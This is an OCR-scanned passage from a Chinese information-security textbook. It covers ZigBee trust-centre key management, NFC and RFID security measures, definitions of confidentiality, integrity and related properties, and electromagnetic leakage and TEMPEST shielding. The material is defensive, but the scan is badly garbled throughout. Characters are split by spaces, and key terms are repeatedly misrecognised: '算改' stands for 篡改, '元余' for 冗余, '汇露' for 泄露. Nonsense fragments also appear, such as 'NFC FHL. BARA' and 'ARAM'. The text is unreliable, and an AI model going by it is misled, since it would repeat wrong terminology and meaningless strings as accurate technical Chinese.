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制 的 网 络 中 ， 网 络 协调 者 可 成 为 信任 中 心 。 信 任 中 心 提供 三 种 功能 :信任 管理 ， 任 务 是 负 
责 对 加 入 网 络 的 设备 验证 ;网 络 管理 ， 任 务 是 负责 获取 和 分 配 网 络 钥匙 给 设备 ;配置 管 
理 ， 任 务 是 对 其 管理 的 设备 绑 定 应 用 程序 ， 在 两 设备 之 间 实 现 端 到 端的 安全 传输 。 为 了 
实现 信任 管理 , 设备 需要 接收 信任 中 心 使 用 非 安全 方式 传输 的 初始 主 密 钥 或 者 网 络 密 钥 。 
为 了 实现 网 络 管理 的 目的 ， 设 备 应 接收 初始 的 网 络 密 钥 ， 并 且 只 能 从 信任 中 心 获得 网 络 
密 钥 的 更 新 。 实 现 网 络 配置 ， 设 备 需 要 从 信任 中 心 接收 主 密 钥 或 链 路 密 钥 ， 以 建立 两 个 
设备 问 的 端 对 端 安全 链 路 。 除 了 初始 的 主 密 钥 ， 附 加 的 链 路 密 钥 、 主 密 钥 、 网 络 密 钥 只 
E 够 采用 安全 的 方式 从 设备 的 信任 中 心 获得 。 信 任 中 心 有 二 种 模式 住宅 模式 和 商用 模 
式 。 对 于 住宅 模式 ， 信 任 中 心 要 维护 一 张 关于 网 络 中 所 有 设备 和 钥匙 的 清单 ， 并 采取 措 
施 对 网 络 访问 和 钥匙 进行 控制 管理 。 同 样 对 于 商用 模式 ， 信 任 中 心 也 要 维护 一 张 网 络 中 
设备 和 钥匙 的 清单 ， 并 实施 策略 对 网 络 钥匙 的 更 新 和 网 络 访问 控制 进行 管理 ， 但 它 还 要 
在 每 个 设备 中 维护 一 个 计数 器 ， 此 计数 器 会 随 着 钥匙 的 产生 不 断 变化 ， 目 的 是 保证 顺序 
更 新 。 商 用 模式 需要 维护 钥匙 并 允许 更 新 ， 具 有 良好 的 扩展 性 ， 但 其 要 消耗 相当 多 的 存 
储 空间 ， 相 比 之 下 住宅 模式 消耗 资源 少 且 不 需要 设置 钥匙 ， 因 而 不 要 更 新 ， 但 其 网 络 的 
扩展 性 不 好 。 信 任 中 心 应 当 根据 某 一 策略 周期 性 地 更 新 网 络 密 钥 ， 并 将 新 的 网 络 密 钥 传 
送 给 每 个 设备 。 在 高 安全 级 别 的 商用 应 用 中 ， 可 以 为 设备 预先 配置 网 络 信任 中 心 的 地 址 
和 初始 的 主 密 钥 。 另 外 ， 如 果 应 用 程序 可 以 承受 片刻 的 攻击 ， 主 密 钥 可 以 通过 一 个 带 内 
的 不 安全 密 钥 传输 发 送 。 如 果 没 有 预先 设置 信任 中 心 ， 则 通常 由 协调 器 担任 或 者 由 协调 
器 指定 某 设备 作为 信任 中 心 。 

3. NFC 安全 

从 NFC 芯片 、 安 全 单元 、 手 机 应 用 等 方面 来 阐述 相关 安全 对 策 。 

O 安全 模块 的 安全 机 制 : 安全 模块 的 访问 控制 机 制 ， 如 PIN 的 错误 尝试 次 数 、 认 
证 的 生命 周期 ， 安 全 密 钥 的 恢复 机 制 ， 避 免 密 钥 丢失 或 无 效 后 加 密 数 据 的 无 法 使 用 ， 机 
密 数 据 禁 止 明 文 存 储 ; 交易 记录 采用 时 间 戳 ， 避 免 数 据 的 重 放 ， 硬 件 完 整 性 检测 ， 支 持 
与 NFC 手机 基带 处 理 之 间 的 互 认证 ;禁止 加 载 没 有 签名 的 软件 下 载 及 运行 。 

@ 基带 处 理 器 的 安全 机 制 ， 手 机 应 用 的 真实 性 、 完 整 性 ， 防 止 PIN 输入 截获 ; 安 
全 域 的 划分 ; 与 安全 模块 的 互 认 证 。 

图 NFC 芯片 的 安全 机 制 为 了 防止 NEC 芯片 的 ID 或 标签 被 随意 读 取 ， 应 支持 用 户 
对 NFC 模块 的 开关 。 

@ 用 户 的 安全 意识 ， 针 对 使 用 NFC 手机 进行 移动 支付 的 用 户 ， 应 该 进行 相关 的 安 
全 意识 的 培训 : 如 何 正确 使 用 NFC 手机 ; 如 何 发 现 潜在 的 安全 威胁 以 及 如 何 应 对 这 些 威 
胁 ; 如 何 防 止 自身 NFC FHL. BARA, PIN 码 的 正确 使 用 及 手机 密码 的 正确 
设置 。 

@ 操作 系统 及 应 用 的 安全 防护 ， 手 机 操作 系统 及 应 用 软件 的 正确 使 用 ， 安 装 安全 
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防护 软件 和 防火 墙 ， 对 手机 安全 软件 的 告警 应 给 予 重视 。 

4. RFID 安全 

@ 针对 RFID 设备 的 破坏 和 攻击 。 可 以 考虑 使 用 “法 拉 第 笼 ” 使 得 攻击 者 对 于 RFID 
的 标签 信息 主动 欺骗 攻击 失效 。 对 于 这 些 破 坏 性 的 攻击 ， 主 要 考虑 使 用 监控 设备 进行 监 
视 、 将 标签 隐藏 在 产品 中 等 传统 方法 。 为 了 降低 恶意 使 用 或 者 误 用 “KILL ”命令 带 来 的 
风险 , 在 Class-1Gen-2EPC 标准 中 ,“KILL ”命令 的 使 用 必须 要 有 一 个 32 位 的 密码 认证 。 

@ Hash-Lock 协议 及 一 系列 改进 方法 ， 核 心思 想 是 使 用 metaID 来 代替 真实 的 标签 
ID 以 避免 信息 泄露 和 被 追踪 。 该 协议 能 够 提供 访问 控制 并 对 标签 数据 进行 保护 。 但 是 由 
于 ID 没有 使 用 动态 刷新 机 制 ， 标 签 易 被 跟踪 定位 。 而 且 key 和 ID 以 明文 形式 发 送 ， 容 
易 被 窃取 者 获取 ， 进 行 假冒 和 重 传 攻击 。 同 时 该 协议 也 不 具有 前 向 安全 性 。 因 此 ， 该 协 
议 未 能 满足 我 们 所 认为 安全 需求 。 但 是 该 协议 运用 “询问 一 一 上 应答” 机制， 建立 了 一 个 
基本 的 安全 协议 模型 ， 是 后 续 许多 协议 的 一 个 基础 。 为 解决 标签 被 跟踪 问题 ， 对 于 读 写 
器 的 不 同 询问 ， 标 签 生成 随机 数 并 以 此 为 基础 进行 随机 相应 。 为 了 进一步 保证 前 向 安全 
性 ， 每 次 标签 收 到 读 写 器 的 认证 请 求 时 ， 将 产生 响应 值 回 传 到 读 写 器 并 且 更 新 密 值 。 标 
签 中 存储 的 密 值 不 断 进行 自我 更 新 ， 避 免 了 被 跟踪 定位 而 导致 隐私 信息 的 泄露 。 
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4.1 计算 机 设备 安全 


4.1.1 计算 机 安全 的 定义 


面 对 信 息 化 社会 汪洋 大 海 般 的 信息 ， 信 息 系 统 已 成 为 信息 处 理 必 不 可 少 的 强 有 力 工 
有 具 。 所 谓 信息 系 统 ， 是 指 人 、 机 和 软件 组 成 的 能 自动 进行 信息 收集 、 传 输 、 存 储 、 加 工 
处 理 、 分 发 和 利用 的 系统 。 它 由 实体 和 信息 两 大 部 分 组 成 。 实 体 是 指 实施 信息 收集 、 传 
输 、 存 储 、 加 工 处 理 、 分 发 和 利用 的 计算 机 及 其 外 部 设备 和 网 络 ， 信 息 是 指 存储 于 计算 
机 及 其 外 部 设备 上 的 程序 和 数据 。 由 于 计算 机 系统 涉及 到 有 关 国 家 安全 的 政治 、 经 济 和 
军事 情况 以 及 一 些 工 商 企业 单位 与 私人 的 机 密 及 敏感 信息 ， 因 此 它 已 成 为 国家 和 某 些 部 
门 的 宝贵 财富 ， 同 时 也 成 为 敌对 国家 和 组 织 以 及 某 些 非法 用 户 、 别 有 用 心 者 威胁 和 攻击 
的 主要 对 象 。 所 以 ， 计 算 机 系统 的 安全 越 来 越 受 到 人 们 的 广泛 重视 。 

保证 计算 机 信息 系统 的 运行 安全 ， 是 计算 机 安全 领域 中 最 重要 的 环节 之 一 。 因 为 只 
有 计算 机 信息 系统 在 运行 过 程 中 的 安全 得 到 保证 ， 才 能 完成 对 信息 的 正确 处 理 ， 达 到 正 
常 发 挥 计算 机 信息 系统 各 项 功能 的 目的 。 

一 般 认 为 ， 计 算 机 安全 的 定义 ， 要 包括 计算 机 实体 及 其 信息 的 完整 性 、 机 密 性 、 抗 
否认 性 、 可 用 性 、 可 审计 性 、 可 靠 性 等 儿 个 关键 因素 。 
4.1.1.1 机 密 性 
机 密 性 是 指 保证 信息 不 被 非 授 权 访 问 ， 即使 非 授 权 用 户 得 到 信息 也 无 法 知晓 信息 内 
容 ， 因 而 不 能 使 用 。 通 常 通过 访问 控制 阻止 非 授权 用 户 获 得 机 密 信息 ， 通 过 加 密 变 换 阻 
止 非 授 权 用 户 获知 信息 内 容 。 
4.1.1.2 ”完整 性 

完整 性 是 指 维护 信息 和 实体 的 人 为 或 非 人 为 的 非 授 权 算 改 。 在 此 过 程 中 ， 需 校 验 信 
息 和 实体 是 否 被 算 改 。 一 般 通过 访问 控制 阻止 算 改 行为 ， 同 时 通过 消息 摘要 算法 来 验证 
ARAM 
4.1.1.3 抗 否 认 性 

抗 否认 性 是 指 能 保障 用 户 无 法 在 事后 否认 曾经 对 信息 进行 的 生成 、 签 发 、 接 收 等 行 
为 。 是 针对 通信 各 方 信息 真实 同一 性 的 安全 要 求 。 一 般 通过 数字 签名 来 提供 抗 和 否认 服务 。 
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4.1.1.4 可 用 性 

可 用 性 是 指 保障 信息 资源 随时 可 提供 服务 的 特性 ， 即 授权 用 户 根据 需要 可 以 随时 访 
问 所 需 信息 。 可 用 性 是 信息 资源 服务 功能 和 性 能 可 靠 性 的 度量 , 涉及 物理 、 网 络 、 系 统 、 
数据 、 应 用 和 用 户 等 多 方面 的 因素 ， 是 对 信息 网 络 总 体 可 靠 性 的 要 求 。 
4.1.1.5 ”可 审计 性 

保证 计算 机 信息 系统 所 处 理 的 信息 的 完整 性 、 准 确 性 和 可 靠 性 ， 防 止 有 意 或 无 意 地 
出 现 错 误 ， 乃 至 防止 和 发 现 计算 机 犯罪 案件 ， 除 了 采用 其 他 安全 措施 之 外 ， 利 用 对 计算 
机 信息 系统 的 审计 的 方法 ， 可 以 对 计算 机 信息 系统 的 工作 过 程 进行 详尽 的 审计 跟踪 ， 同 
时 保存 审计 记录 和 审计 日 志 ， 从 中 可 以 发 现 问题 。 

利用 审计 跟踪 的 工具 ， 可 以 记录 用 户 的 活动 。 如 用 户 的 姓名 ， 使 用 系统 的 时 间 和 日 
期 ， 正 在 访问 的 文件 和 各 种 其 他 的 系统 服务 功能 。 另 外 在 一 些 系统 中 可 对 用 户 账号 进行 
的 修改 、 增 加 或 删除 等 操作 进行 记载 ， 并 放 入 日 志文 件 中 进行 保存 。 日 志文 件 所 记录 的 
审计 跟踪 结果 校 放 在 计算 机 的 磁盘 中 ， 并 可 在 需要 的 时 候 打 印 输出 。 同 时 审计 跟踪 还 可 
对 系统 管理 进行 记录 ， 如 记录 某 用 户 注册 尝试 的 状态 〈 在 多 用 户 系统 中 ) 、 用 时 的 状态 
等 。 审 计 跟 踪 程 序 还 可 对 程序 和 文件 的 使 用 进行 监控 ， 记 录 程序 和 文件 的 使 用 及 对 文件 
的 各 种 处 理 过 程 。 

审计 跟踪 可 以 监控 和 捕捉 各 种 安全 事件 ， 如 多 次 的 使 用 错误 的 口令 试图 进入 系统 ， 
试图 越权 对 某 些 程序 或 文件 进行 操作 。 审 计 跟 踪 可 对 这 些 操作 的 时 间 、 终 端 号 等 一 些 有 
关 的 信息 进行 定位 ， 以 便于 发 现 和 解决 计算 机 信息 系统 中 出 现 的 安全 问题 。 

审计 跟踪 的 另 一 个 主要 功能 是 保存 、 维 护 和 管理 审计 日 志 ， 因 为 审计 日 志 是 审计 跟 
踪 的 最 终结 果 ， 是 记录 系统 出 现 问题 的 依据 ， 是 非常 重要 的 文档 资料 ， 所 以 必须 有 好 的 
保存 和 管理 办 法 ， 使 之 不 臻 被 任意 地 删除 或 算 改 。 
4.1.1.6 可靠 性 

计算 机 系统 的 可 靠 性 是 指 计算 机 在 规定 的 条 件 下 和 给 定 的 时 间 内 完成 预定 功能 的 
概率 。 

产品 在 规定 的 条 件 下 和 规定 的 时 间 内 丧失 规定 的 功能 , 即 发 生 失效 。 所 谓 “ 失 效率 ”， 
是 指 计算 机 在 某 一 瞬间 失效 元 件数 与 元 件 总 数 的 比率 ， 或 者 说 工作 到 某 一 时 刻 尚 未 失效 
的 产品 ， 在 该 时 刻 以 后 单位 时 间 内 发 生 失 效 的 概率 。 

实践 表明 ， 影 响 计算 机 可 靠 性 的 因素 有 内 因 和 外 因 两 个 方面 : 内 因 是 指 机 器 本 身 的 
因素 ， 包 括 设计 、 工 艺 、 结 构 、 调 试 等 因素 ， 元 件 选择 和 使 用 是 否 得 当 、 电 路 和 结构 设 
计 不 合理 、 生 产 工 艺 不 良 、 质 量 控制 不 严 、 调 试 不 当 等 都 会 影响 计算 机 的 可 靠 性 ， 外 因 
是 指 所 在 环境 条 件 对 系统 可 靠 性 、 稳 定性 和 维护 水 平 的 影响 。 环 境 条 件 包括 : 空气 条 件 
〈 如 温度 、 湿 度 、 盐 雾 等 ) 、 机 械 条 件 〈 如 振动 、 冲 击 、 离 心 加 速 、 摇 摆 等 ) 、 电 气 条 件 
〈 如 电磁 稳定 性 、 接 地 系统 、 雷 击 、 静 电 等 ) 、 电 磁 条 件 ( 如 大 电机 、 变 压 器 、 大 功率 开 
关 等 强 电磁 场 对 计算 机 磁性 元 件 的 影响 ) 等 几 个 方向 。 
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为 了 探讨 影响 计算 机 可 靠 性 的 因素 ， 人 们 进行 了 大 量 的 可 靠 性 试验 研究 。 可 靠 性 试 
验 主 要 包括 : 环境 试验 、 寿 命 试验 、 现 场 试验 和 特种 试验 。 通 常 进行 的 环境 试验 有 空气 
条 件 试验 、 振 动 冲击 试验 、 辐 射 条 件 试验 《〈 电 磁场 和 射线 干扰 试验 ) 、 电 气 条 件 和 人 为 
因素 〈 如 运输 、 使 用 。 存 放 ) 试验 等 。 必 要 时 还 进行 生物 条 件 〈 如 霉菌 、 虫 害 ) 试验 等 。 

一 般 认 为 ， 在 系统 的 可 靠 性 工程 中 ， 元 器 件 是 基础 ， 设 计 是 关键 ， 环 境 是 保证 。 因 
此 ， 想 要 提高 信息 系统 的 可 靠 性 ， 除 了 保证 系统 的 正常 工作 条 件 及 正确 使 用 和 维护 外 ， 
还 要 采用 是 容错 技术 和 故障 诊断 技术 。 

容错 技术 是 指 用 增加 元 余 资 源 的 方法 来 掩盖 故障 造成 的 影响 ， 使 系统 在 元 器 件 或 线 
路 有 故障 或 软件 有 差错 时 ， 仍 能 正确 地 执行 预定 算法 的 功能 。 因 此 ， 容 错 技术 也 称 为 元 
余 技 术 或 故障 掩盖 技术 。 计 算 机 信息 系统 的 容错 技术 通常 采用 硬件 元 余 (多重 结 构 、 表 
决 系统 、 双 机 系统 等 ) 、 时 间 宛 余 〈 指 令 复 执 、 程 序 重 试 等 ) 、 信 息 元 余 〈 校 验 码 、 纠 
密码 等 ) 、 软 件 元 余 〈 多 重 模块 、 阶 段 表决 等 ) 等 方法 。 

故障 诊断 技术 则 是 通过 检测 和 排除 系统 元 器 件 或 线路 故障 ， 或 纠正 程序 的 错误 来 保 
证 和 提高 系统 可 靠 性 的 方法 。 


4.1.2 计算 机 系统 结构 的 安全 实现 


当前 计算 机 系统 的 工作 环境 并 不 安全 ， 计 算 机 系统 的 重要 应 用 成 为 威胁 和 攻击 的 目 
标 。 因 为 计算 机 系统 存储 和 处 理 有 关 国 家 安全 的 政治 、 经 济 、 军 事情 况 及 一 些 部 门 、 组 
织 的 机 密 信 息 或 个 人 的 敏感 信息 ， 因 此 成 为 国外 敌对 国家 情报 部 门 和 一 些 组 织 或 个 人 威 
胁 和 攻击 的 目标 。 计 算 机 系统 本 身 的 脆弱 性 成 为 不 安全 的 内 在 因素 。 由 于 计算 机 系统 本 
身 的 脆弱 性 以 及 硬件 和 软件 的 开放 性 ， 加 之 缺乏 完善 的 安全 措施 ， 容 易 给 犯罪 分 子 以 可 
乘 之 机 。 

随 计算 机 功能 的 日 益 完善 和 运行 速度 的 不 断 提高 ， 其 系统 组 成 越 来 越 复杂 ， 规 模 也 
越 来 越 庞大 ， 所 用 元 器 : 数量 不 断 增加 ， 装 配 密度 日 益 加 大 ， 其 本 身 存 在 的 隐患 就 成 为 
不 安全 因素 。 另 外 ， 随 着 计算 机 网 络 的 迅速 发 展 ， 而 且 越 来 越 大 ， 更 增加 了 隐患 和 被 攻 
击 的 区 域 及 环节 。 计 算 机 使 用 的 场所 逐渐 从 条 件 优 越 的 机 房 转向 工业 、 野 外 、 海 上 、 天 
空 、 宇 宙 、 核 辐射 环境 ， 其 气候 、 力 学 、 电 磁 和 辐射 等 应 力 都 比 机 房 恶劣 ， 恶 劣 的 环境 
条 件 会 导致 计算 机 出 错 概率 和 故障 的 增加 ， 其 可 靠 性 和 安全 性 便 受到 影响 。 随 着 计算 机 
系统 的 广泛 应 用 。 应 用 人 员 队 伍 不 断 扩 大 ， 各 层次 的 应 用 人 员 增 多 ， 人 为 的 某 些 因素 ， 
如 操作 失误 的 概率 增加 、 会 威胁 信息 系统 的 安全 。 安 全 是 针对 某 种 威胁 而 言 的 ， 对 计算 
机 系统 来 说 ， 许 多 威胁 和 攻击 是 隐蔽 的 ， 防 范 对 象 是 广泛 的 、 难 以 明确 的 ， 即 潜在 的 。 

计算 机 系统 安全 涉及 到 许多 学 科 ， 既 包含 自然 科学 和 技术 ， 又 包含 社会 科学 。 就 技 
术 而 言 ， 计 算 机 系统 安全 涉及 计算 机 技术 、 通 信 技 术 、 存 取 控 制 技术 、 验 证 技术 、 容 错 
技术 、 诊 断 技术 、 加 密 技 术 、 防 病毒 技术 、 抗 干扰 技术 和 防 泄露 技术 等 。 因 此 它 是 一 个 
综合 性 很 强 的 问题 。 要 想 解决 好 计算 机 系统 的 安全 ， 就 必须 首先 从 计算 机 的 系统 结构 和 
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基础 出 发 ， 从 计算 机 硬件 环境 出 发 ， 找 到 一 条 合理 地 解决 问题 的 道路 。 
4.1.2.1 系统 安全 的 概念 

计算 机 系统 安全 是 指 : 为 了 保证 计算 机 信息 系统 安全 可 靠 运行 ， 确 保 计 算 机 信息 系 
统 在 对 信息 进行 采集 、 处 理 、 传 输 、 存 贮 过 程 中 ， 不 致 受到 人 为 (包括 未 授权 使 用 计算 
机 资源 的 人 ) 或 自然 因素 的 危害 ,而 使 信息 丢失 、 泄 露 或 破坏 , 对 计算 机 设备 、 设施 ( 包 
括 机 房 建筑 、 供 电 、 空 调 等 ) 、 环 境 人 员 等 采取 适当 的 安全 措施 。 

从 以 上 对 计算 机 信息 系统 的 实体 安全 的 定义 可 以 看 到 ， 保 证 计算 机 信息 系统 的 安全 
涉及 的 范围 是 很 广 的 。 而 且 是 一 种 技术 性 要 求 高 ， 投 资 巨大 的 工作 。 
4.1.2.2 ”系统 安全 的 实现 方法 

计算 机 系统 安全 是 一 门 交 义学 科 , 涉及 多 方面 的 理论 和 应 用 知识 。 除 了 数学 、 通 信 、 
计算 机 等 自然 科学 外 ， 还 涉及 法 律 、 心 理学 等 社会 科学 。 对 系统 安全 的 研究 大 致 可 以 分 
为 基础 理论 研究 、 应 用 技术 研究 、 安 全 管理 研究 等 。 

基础 理论 研究 包括 密码 研究 、 安 全 理论 研究 ;应 用 技术 研究 包括 安全 实现 技术 、 安 
全 平台 技术 研究 ， 安 全 管理 研究 包括 安全 标准 、 安 全 策略 、 安 全 测评 等 。 

密码 理论 的 研究 重点 是 算法 ， 包 括 数 据 加 密 算法 、 数 字 签名 算法 、 消 息 摘要 算法 及 
相应 的 密 钥 管理 协议 等 。 这 些 算法 提供 两 方面 的 服务 : 一 方面 ， 直 接 对 信息 进行 运算 ， 
保护 信息 的 安全 特性 ， 即 通过 加 密 变 换 保护 信息 的 机 密 性 ， 通 过 消息 摘要 变换 检测 信息 


完整 性 ， 通 过 数字 签名 保护 信息 的 抗 否认 性 ; 另 一 方面 ， 提 供 对 身份 认证 和 安全 协议 
理论 的 支持 。 
安全 理论 的 研究 重点 是 单机 环境 、 网 络 环境 下 信息 防护 的 基本 理论 ， 主 要 有 访问 控 
制 、 身 份 认证 、 审 计 追 踪 、 安 全 协议 等 。 这 些 研 究 成 果 为 建设 安全 平台 提供 理论 依据 。 

安全 技术 的 研究 重点 是 在 单机 或 网 络 环境 下 信息 防护 的 应 用 技术 ， 目 前 主要 有 防火 
墙 技 术 、 入 侵 检测 技术 、 漏 洞 扫描 技术 、 防 病毒 技术 等 。 其 具体 的 思路 与 具体 的 平台 环 
境 关 系 密切 ， 研 究 成 果 直接 为 平台 安全 防护 和 检测 提供 技术 依据 。 

平台 安全 是 指 保障 承载 信息 产生 、 存 储 、 传 输 和 处 理 的 平台 的 安全 和 可 控 。 平 台 由 
网 络 设备 、 主 机 《服务 器 、 终 端 ) 、 通 信 网 、 数 据 库 等 有 机 组 合 而 成 ， 这 些 设备 组 成 网 
络 并 形成 特定 的 连接 边界 。 平 台 安全 不 仅 涉及 物理 安全 、 网 络 安 全 、 系 统 安全 、 数 据 安 
全 和 边界 安全 ， 还 包括 用 户 行为 的 安全 。 

此 外 ,安全 管理 也 是 很 重要 的 。 管 理应 该 有 统一 的 标准 、 可 行 的 策略 和 必要 的 测评 ， 
因此 ， 安 全 管理 包括 安全 标准 、 安 全 策略 、 安 全 测评 等 。 这 些 管理 措施 作用 于 安全 理论 
和 技术 的 各 个 方面 。 


4.1.3 ”电磁 泄露 和 干扰 


计算 机 及 其 外 部 设备 工作 时 ， 伴 随 着 信息 输 和 入、 传输、 存储、 处理、 输出、 显示 等 
过 程 . 有 用 的 信息 会 通过 寄生 信号 向 外 泄露 。 计算 机 设备 包括 主机 、 磁 盘 机 、 显 示 终 端 、 
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打印 机 、 磁 带 机 等 所 有 设备 ， 工 作 时 都 会 产生 不 同 程度 的 电磁 泄露 ， 如 主机 中 各 种 数字 
电路 电流 的 电磁 泄露 、 显 示 器 视频 信号 的 电磁 泄露 、 键 盘 开关 引起 的 电磁 泄露 、 打 印 机 
的 低频 电磁 泄露 等 。 研 究 表明 ， 普 通 计算 机 的 显示 终端 辐射 带 信息 的 电磁 波 ， 在 100M 
以 外 还 能 够 接收 和 复 现 。 因 为 显示 终端 是 泄露 的 主要 器 件 ， 所 以 对 它 做 一 下 定量 分 析 。 
CRT 采用 阴极 射线 管 ， 显 示 的 信息 有 字符 、 数 字 、 图 像 、 图 形 ， 并 允许 通过 键盘 进行 人 
机 对 话 和 修改 。CRT 处 理 的 信号 属于 视频 ， 其 电磁 辐射 机 理 较 复杂 ， 表 现在 有 串 行 信号 
也 有 并 行 信 号 ， 电 路 中 有 高 压 也 有 低压 ， 有 载波 的 电子 束 也 有 传导 电流 ， 有 晶体 管 也 有 
集成 芯片 ， 有 周期 信号 泄露 ， 也 有 随机 的 非 周期 泄露 。 受 有 用 的 视频 信号 控制 的 电子 束 
含有 串 行 的 视频 信息 ， 是 泄露 源 。CRT 镀 铝 的 荧光 屏 管 壁 有 接地 的 石墨 导电 层 ， 为 二 次 
电子 提供 通路 ， 既 有 屏蔽 作用 又 有 辐射 作用 ， 其 屏蔽 作用 较 小 。 该 回路 的 地 线 有 信息 汇 
露 ， 电 子 束 与 接地 回路 泄露 的 信息 一 旦 被 截 ， 若 能 同时 获得 扫描 同步 信号 ， 信 息 将 被 
复 现 。 

计算 机 系统 外 部 设备 在 工作 时 能 够 通过 地 线 、 电 源 线 、 信 号 线 、 寄 生 电磁 信号 或 谐 
波 将 有 用 信息 辐射 的 过 程 ， 叫 计算 机 的 电磁 泄露 。 

利用 计算 机 设备 的 电磁 泄露 窃取 机 密 信息 是 国内 外 情报 机 关 截 获 信息 的 重要 途径 ， 
因为 用 高 灵敏 度 的 仪器 截获 计算 机 及 外 部 设备 中 泄露 的 信息 ， 比 用 其 他 方法 获得 情报 要 
准确 、 可 靠 、 及 时 、 连 续 ， 而 且 隐蔽 性 好 ， 不 易 被 对 方 察觉 。 截 获 的 内 容 十 分 广泛 ， 如 
军事 、 政 治 、 经 济 情报 ， 长 途 电话 通话 的 内 容 及 其 他 电子 设备 中 泄露 的 情形 。 计 算 机 设 
备 的 电磁 泄露 ， 不 仅 会 造成 信息 的 泄露 ， 而 且 直接 危及 密码 和 密 钥 的 安全 。 这 一 问题 对 
信息 系统 的 安全 和 国家 安全 造成 直接 威胁 ， 因 此 ， 电 磁 泄 露 是 信息 系统 安全 的 一 个 重要 
课题 ， 防 电磁 泄露 技术 就 是 防止 和 抑制 电磁 泄露 的 专门 技术 。 
4.1.31 电磁 泄露 发 射 检查 测试 方法 和 安全 判 据 

计算 机 及 其 外 部 设备 内 的 信息 ， 可 以 通过 两 种 途径 泄露 : 一 种 是 以 电磁 波 的 形式 辐 
射出 去 ， 称 为 辐射 泄露 ， 另 一 种 是 通过 各 种 线路 和 人 金属 管道 传导 出 去 ， 称 为 传导 泄露 。 
一 般 而 言 ， 传 导 泄露 还 伴随 着 辐射 泄露 。 例 如 计算 机 系统 的 电源 线 、 机 房 内 的 电话 线 、 
下 水 管道 和 暖气 管道 、 地 线 等 都 可 能 作为 传导 媒介 ， 这 些 金属 导体 有 时 起 着 无 线 电 天 线 
作用 将 传导 的 信号 辐射 出 去 。 

计算 机 的 辐射 泄露 主要 指 计算 机 内 部 产生 的 电磁 辐射 ， 这 种 辐射 是 由 计算 机 内 部 的 
各 种 传输 线 〈 包 括 印 制 板 上 的 走 线 ) 产生 的 。 电 磁 波 的 发 射 必 须 借助 于 上 述 的 天 线 作 用 
的 传输 线 才能 实现 。 计 算 机 中 的 传导 泄露 可 能 有 两 种 基本 模式 : 共 模 泄露 和 差 模 泄 露 ， 
或 者 是 两 者 的 综合 。 

理论 计算 和 分 析 表 明 ， 影 响 计算 机 电磁 辐射 强度 的 主要 因素 有 : 

(1) 功率 和 频率 : 载 流 导线 小 的 电流 强度 越 大 ， 辐 射 源 辐射 的 强度 越 大 ， 反 之 则 越 
小 。 实 际 测 试 表明 ， 设 备 的 功率 越 大 ， 辐 射 的 强度 越 高 。 对 于 传导 场 来 说 ， 传 导 频 率 越 
高 ， 辐 射 汇 圳 的 强度 越 大 。 
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(2) 与 辐射 源 的 距离 ， 一 般 来 说 ， 在 其 他 条 件 相 同 的 情况 下 大 ， 与 辐射 源 越 远 ， 场 
强 衰 减 越 大 ， 其 场 强 与 距离 成 反比 。 

G) 屏蔽 状况 ， 辐射 源 是 否 屏蔽 ， 对 电磁 泄露 影响 很 大 。 

413.2 ” 涉 密 信息 设备 使 用 现场 的 电磁 泄露 

在 美国 ， 有 关 计 算 机 及 信息 设备 防 信息 电磁 泄露 的 技术 称 TEMPEST 技术 。 关 于 
“TEMPEST” 一 词 有 不 同 理解 ， 一 种 观点 认为 是 缩写 ， 另 一 种 看 法 则 认为 只 是 一 种 代号 。 
目前 世界 许多 国家 也 使 用 它 。 据 报道 ， 美 国 国 家 安全 局 在 第 二 次 世界 大 战 后 不 久 就 注意 
到 计算 机 及 外 围 设备 的 信息 电磁 泄露 效应 ， 并 着 手 开发 低 泄露 产品 。 这 些 标 准 是 非常 机 
密 的 ， 盟 国之 问 也 不 相互 公开 。 

TEMPEST 的 电磁 泄露 是 指 电子 设备 的 杂 散 〈 寄 生 ) 电磁 能 量 通过 导线 或 空间 向 外 
扩散 ， 它 是 客观 存在 的 。 任 何 处 于 工作 状态 的 电磁 信息 设备 ， 如 : 计算 机 、 打 印 机 、 传 
真 机 、 电 话机 等 ， 都 存在 不 同 程度 的 电磁 泄露 现象 ， 这 是 无 法 摆脱 的 电磁 学 现象 。 如 果 
这 些 泄露 “夹带 ”着 设备 所 处 理 的 信息 ， 就 构成 了 所 谓 的 TEMPEST 泄露 发 射 。 

TEMPEST 泄露 发 射 通过 辐射 和 传导 两 种 途径 向 外 传播 。 辐 射 泄露 是 杂 散 电磁 能 量 
以 电磁 波形 式 透 过 设备 外 过 、 外 过 上 的 各 种 孔 缝 、 连 接 电缆 等 辐射 出 去 ， 传 导 泄露 是 杂 
散 电 磁 能 量 通过 各 种 线路 (包括 电源 线 、 信 号 线 等 ) 传导 出 去 。 二 者 相互 关联 ， 即 存在 
相互 “能 量 交 换 ” 现 象 ; 设备 泄露 出 去 的 电磁 信息 可 分 为 “ 红 信 号 ”和 “ 黑 信 号 ”两 部 
分 。 红 信号 是 与 设备 处 理 或 传输 的 信息 有 关 的 信号 ; 黑 信 号 是 与 设备 处 理 或 传输 的 信息 
无 关 的 信号 。 对 信息 安全 构成 威胁 的 主要 是 “ 红 信和 号”。 

事实 上 ， 几 乎 所 有 电磁 泄露 都 “夹带 ”着 设备 所 处 理 的 信息 ， 只 是 程度 不 同 而 已 。 
根据 TEMPEST 的 泄露 发 射 模型 ， 在 实际 中 常用 的 电磁 防护 措施 有 : 屏蔽 、 滤 波 、 隔 离 、 
合理 的 接地 与 良好 的 搭 接 、 选 用 低 泄露 设备 、 合 理 的 布局 和 使 用 干扰 器 ， 传 输 信 息 加 
密 等 。 
4.1.3.3 ”电磁 泄露 的 处 理 方法 

电磁 泄露 的 解决 方法 主要 有 以 下 几 种 : 

1. 低 泄 射 产品 

低 汇 射 产品 是 综合 运用 抑 源 法 和 屏蔽 法 制造 的 满足 TEMPEST 低 电 磁 信息 泄露 发 射 
的 信息 设备 ， 与 一 般 商用 机 不 同 ，TEMPEST 信息 设备 为 抑制 电磁 泄露 采取 了 多 种 方法 。 
如 “包容 法 ”， 使 用 厚 的 金属 机 箱 将 商用 机 屏蔽 起 来 而 成 ， 一 些 必要 的 通风 孔 采 用 波导 
Ba: 必须 的 开口 ， 如 磁盘 插口 则 使 用 带 筑 片 的 可 开启 封闭 门 。 这 种 结构 有 如 一 个 小 
的 屏蔽 室 ， 可 使 其 达到 TEMPEST 标准 要 求 。 单 独 采用 这 种 方法 成 本 高 ， 同 时 体积 与 重 
量 增 大 。 随 着 技术 的 成 熟 ， 后 来 的 TEMPEST 产品 在 采用 “包容 法 ”的 同时 也 采用 “ 抑 
源 法 ”设计 。“ 抑 源 法 ”不 是 利用 现成 商用 机 ， 而 是 按照 抑制 红 信号 电磁 泄露 发 射 的 原 
